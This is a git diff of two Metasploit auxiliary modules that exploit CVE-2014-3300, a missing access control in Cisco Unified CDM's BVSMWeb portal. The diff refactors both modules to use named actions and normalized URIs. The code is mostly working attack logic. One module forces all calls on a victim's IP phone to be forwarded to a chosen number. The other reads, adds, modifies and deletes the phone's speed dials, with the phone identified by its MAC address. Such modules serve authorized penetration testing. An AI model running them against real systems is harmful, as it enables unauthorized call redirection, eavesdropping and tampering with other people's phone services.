diff --git a/modules/auxiliary/voip/viproy_cucdm_callforward.rb b/modules/auxiliary/voip/viproy_cucdm_callforward.rb index 3ea066c89f..27618658a2 100644 --- a/modules/auxiliary/voip/viproy_cucdm_callforward.rb +++ b/modules/auxiliary/voip/viproy_cucdm_callforward.rb @@ -15,28 +15,42 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super( 'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool', - 'Version' => '1', 'Description' => %q{ - CUCDM IP Phone XML Services - Call Forwarding Tool - This tool can be tested with the voss-xmlservice component of Viproy. - https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb + The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM) + in Unified CDM Application Software before 10 does not properly implement access control, + which allows remote attackers to modify user information. This vulnerability can be exploited + for unauthorised call forwarding using this module. This tool can be tested with the fake + voss-xmlservice component of Viproy. }, 'Author' => 'Fatih Ozavci ', - 'References' => + 'References' => [ - ['CVE', 'CVE-2014-3300'], + ['CVE', '2014-3300'], ['BID', '68331'], + ['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb'] ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ 'FORWARD', { + 'Description' => 'Enabling the call forwarding for the MAC address.' + } ], + [ 'INFO', { + 'Description' => 'Retrieving the call forwarding information for the MAC address.' + } ], + [ 'list', { + 'Description' => 'List the actions that would be started' + } ] + ], + 'DefaultAction' => 'INFO' + ) register_options( [ - Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']), OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']), OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']), - OptString.new('ACTION', [ true, 'Call forwarding action (FORWARD,INFO)', 'FORWARD']), OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']), ], self.class) end @@ -44,21 +58,21 @@ class Metasploit3 < Msf::Auxiliary def run uri = normalize_uri(target_uri.to_s) mac = Rex::Text.uri_encode(datastore["MAC"]) - forwardto = Rex::Text.uri_encode(datastore["FORWARDTO"]) + forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"]) print_status("Getting fintnumbers and display names of the IP phone") - uri_show=uri+"/showcallfwd.cgi?device=SEP#{mac}" + uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}") vprint_status("URL: "+uri_show) res = send_request_cgi( { 'uri' => uri_show, 'method' => 'GET', - }, 20) + }) - if (res and res.code == 200 and res.body =~ /fintnumber/) + if res and res.code == 200 and res.body =~ /fintnumber/ doc = REXML::Document.new(res.body) lines=[] fintnumbers=[] @@ -72,29 +86,31 @@ class Metasploit3 < Msf::Auxiliary } lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])} + # for a specific FINTNUMBER redirection + fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]] - if datastore["ACTION"] == "FORWARD" + if action.name.upcase == "FORWARD" fintnumbers.each {|fintnumber| print_status("Sending call forward request for #{fintnumber}") - uri_fwd=uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forwardto}" + uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}") vprint_status("URL: "+uri_fwd) res = send_request_cgi( { 'uri' => uri_fwd, 'method' => 'GET', - }, 20) + }) - uri_fwdpln=uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}" + uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}") vprint_status("URL: "+uri_fwdpln) res = send_request_cgi( { 'uri' => uri_fwdpln, 'method' => 'GET', - }, 20) + }) - if (res.body.to_s =~ /CFA/) + if res and res.body and res.body.to_s =~ /CFA/ print_good("Call forwarded successfully for #{fintnumber}") else print_status("Call forward failed.") diff --git a/modules/auxiliary/voip/viproy_cucdm_speeddials.rb b/modules/auxiliary/voip/viproy_cucdm_speeddials.rb index 9560ca37b5..b88c3296c8 100644 --- a/modules/auxiliary/voip/viproy_cucdm_speeddials.rb +++ b/modules/auxiliary/voip/viproy_cucdm_speeddials.rb @@ -13,19 +13,40 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super( 'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool', - 'Version' => '1', 'Description' => %q{ - CUCDM IP Phone XML Services - Speed Dial Attack Tool - This tool can be tested with the voss-xmlservice component of Viproy. - https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb + The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM) + in Unified CDM Application Software before 10 does not properly implement access control, + which allows remote attackers to modify user information. This vulnerability can be exploited + for unauthorised speeddial manipulation using this module. This tool can be tested with the fake + voss-xmlservice component of Viproy. }, 'Author' => 'Fatih Ozavci ', 'References' => [ - ['CVE', 'CVE-2014-3300'], + ['CVE', '2014-3300'], ['BID', '68331'], + ['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb'] ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ 'GET', { + 'Description' => 'Getting the speeddials for the MAC address.' + } ], + [ 'MODIFY', { + 'Description' => 'Modifying a speeddial for the MAC address.' + } ], + [ 'ADD', { + 'Description' => 'Adding a speeddial for the MAC address.' + } ], + [ 'DELETE', { + 'Description' => 'Deleting a speeddial for the MAC address.' + } ], + [ 'list', { + 'Description' => 'List the actions that would be started' + } ] + ], + 'DefaultAction' => 'GET' ) register_options( @@ -33,7 +54,6 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']), OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']), - OptString.new('ACTION', [ true, 'Speed Dials Action: LIST|MODIFY|ADD|DELETE', 'LIST']), OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']), OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']), OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']), @@ -48,19 +68,19 @@ class Metasploit3 < Msf::Auxiliary telno = Rex::Text.uri_encode(datastore["TELNO"]) - case datastore["ACTION"].upcase + case action.name.upcase when 'MODIFY' print_status("Deleting Speed Dial of the IP phone") url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/ print_good("Speed Dial #{position} is deleted successfully") print_status("Adding Speed Dial to the IP phone") url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Added/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Added/ print_good("Speed Dial #{position} is added successfully") elsif res.body =~ /exist/ print_error("Speed Dial is exist, change the position or choose modify!") @@ -74,8 +94,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Deleting Speed Dial of the IP phone") url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/ print_good("Speed Dial #{position} is deleted successfully") else print_error("Speed Dial is not found!") @@ -84,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Adding Speed Dial to the IP phone") url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - if (res != Exploit::CheckCode::Safe and res.body =~ /Added/) + status,res=send_rcv(url) + if status != Exploit::CheckCode::Safe and res.body =~ /Added/ print_good("Speed Dial #{position} is added successfully") elsif res.body =~ /exist/ print_error("Speed Dial is exist, change the position or choose modify!") @@ -97,23 +117,24 @@ class Metasploit3 < Msf::Auxiliary url=uri+"/speeddials.cgi?device=SEP#{mac}" vprint_status("URL: "+url) - res=send_rcv(url) - parse(res) if res != Exploit::CheckCode::Safe + status,res=send_rcv(url) + parse(res) if status != Exploit::CheckCode::Safe end end def send_rcv(uri) + uri=normalize_uri(uri.to_s) res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', - }, 20) - if (res and res.code == 200 and res.body =~ /Speed [D|d]ial/) - return res + }) + if res and res.code == 200 and res.body =~ /Speed [D|d]ial/ + return Exploit::CheckCode::Vulnerable,res else print_error("Target appears not vulnerable!") - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe,res end end